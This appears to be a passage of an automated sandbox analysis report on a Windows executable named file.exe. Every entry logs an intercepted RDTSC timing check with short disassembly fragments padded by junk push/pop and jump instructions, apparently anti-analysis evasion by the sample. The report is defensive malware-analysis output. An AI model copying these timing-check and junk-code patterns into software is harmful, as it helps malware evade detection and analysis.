              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0CF3 second address: 10F0CF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0CF9 second address: 10F0D33 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA4947DCE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 08DEED0Eh 0x00000011 jmp 00007FBA4947DCF6h 0x00000016 push B3731863h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 je 00007FBA4947DCE6h 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E25 second address: 10F0E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E2A second address: 10F0E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E69 second address: 10F0E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 adc dh, FFFFFFABh 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FBA4947B566h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E80 second address: 10F0E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E86 second address: 10F0E90 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA4947B56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0FB2 second address: 10F0FCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FBA4947DCE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jl 00007FBA4947DCF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0FCB second address: 10F0FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0FCF second address: 10F0FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A108 second address: 112A10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A10E second address: 112A11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007FBA4947DCE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A3A0 second address: 112A3C4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBA4947B566h 0x00000008 jmp 00007FBA4947B56Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jng 00007FBA4947B566h 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A3C4 second address: 112A3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA4947DCF5h 0x00000009 jmp 00007FBA4947DCF5h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A3F2 second address: 112A3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A556 second address: 112A579 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBA4947DCF9h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A579 second address: 112A584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D748 second address: 112D768 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FBA4947DCEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FBA4947DCE6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D768 second address: 112D778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FBA4947B566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D778 second address: 112D77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113B052 second address: 113B073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBA4947B566h 0x0000000a jmp 00007FBA4947B577h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142CE5 second address: 1142CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142CEF second address: 1142CF5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141D65 second address: 1141D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141D69 second address: 1141D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141D6D second address: 1141D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141D75 second address: 1141D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F126E second address: 10F1290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBA4947DCF9h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1290 second address: 10F1294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142007 second address: 1142018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jp 00007FBA4947DCE6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142A0E second address: 1142A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947B56Ch 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jmp 00007FBA4947B56Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FBA4947B566h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11459F1 second address: 1145A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A00 second address: 1145A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FBA4947B56Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A19 second address: 1145A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A21 second address: 1145A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145179 second address: 114517D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D45A second address: 114D4A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B572h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007FBA4947B56Ch 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FBA4947B578h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D4A3 second address: 114D4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D4A9 second address: 114D4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B3C5 second address: 114B3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B3CD second address: 114B3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B3D4 second address: 114B404 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA4947DCF2h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FBA4947DCEAh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FBA4947DCFCh 0x00000019 jmp 00007FBA4947DCF0h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B404 second address: 114B40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B40B second address: 114B418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FBA4947DCE6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114B582 second address: 114B5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FBA4947B566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FBA4947B56Eh 0x00000012 ja 00007FBA4947B566h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C178 second address: 114C18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEDh 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C43A second address: 114C440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C440 second address: 114C446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C446 second address: 114C46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBA4947B578h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007FBA4947B566h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C46D second address: 114C473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C473 second address: 114C480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C480 second address: 114C484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C484 second address: 114C494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FBA4947B566h 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C494 second address: 114C4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCECh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C794 second address: 114C7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA4947B577h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C7B4 second address: 114C7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FBA4947DCE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114C7C2 second address: 114C7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB12 second address: 114CB79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA4947DCECh 0x00000008 jmp 00007FBA4947DCEFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FBA4947DCF9h 0x00000015 pushad 0x00000016 jno 00007FBA4947DCE6h 0x0000001c jne 00007FBA4947DCE6h 0x00000022 pushad 0x00000023 popad 0x00000024 jo 00007FBA4947DCE6h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FBA4947DCF6h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CB79 second address: 114CB7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151830 second address: 115183C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBA4947DCE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115183C second address: 1151840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154308 second address: 115430C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115430C second address: 1154310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115447E second address: 115448E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA4947DCE6h 0x00000008 js 00007FBA4947DCE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115448E second address: 1154493 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115461A second address: 115461E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115461E second address: 1154622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154622 second address: 1154635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FBA4947DCE6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154635 second address: 115463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154CA3 second address: 1154CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154CAE second address: 1154CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1154CB2 second address: 1154CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A441 second address: 115A47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947B574h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA4947B572h 0x00000013 jmp 00007FBA4947B56Eh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A47E second address: 115A482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A8DF second address: 115A8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FBA4947B568h 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A8F3 second address: 115A8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ABDA second address: 115ABDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115ABDF second address: 115AC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FBA4947DCE6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AC03 second address: 115AC09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AEB5 second address: 115AEB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AEB9 second address: 115AECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007FBA4947B566h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115AECF second address: 115AED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B17F second address: 115B1B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d push edi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FBA4947B56Eh 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B1B2 second address: 115B1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B2FA second address: 115B2FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115B2FF second address: 115B315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115BA71 second address: 115BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115BA7C second address: 115BA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115BA82 second address: 115BAA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115BAA5 second address: 115BAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A034 second address: 115A06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FBA4947B566h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FBA4947B579h 0x00000013 jg 00007FBA4947B566h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A06A second address: 115A06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1165CCE second address: 1165CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659A8 second address: 11659AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659AE second address: 11659B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659B4 second address: 11659B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659B8 second address: 11659BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659BE second address: 11659C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
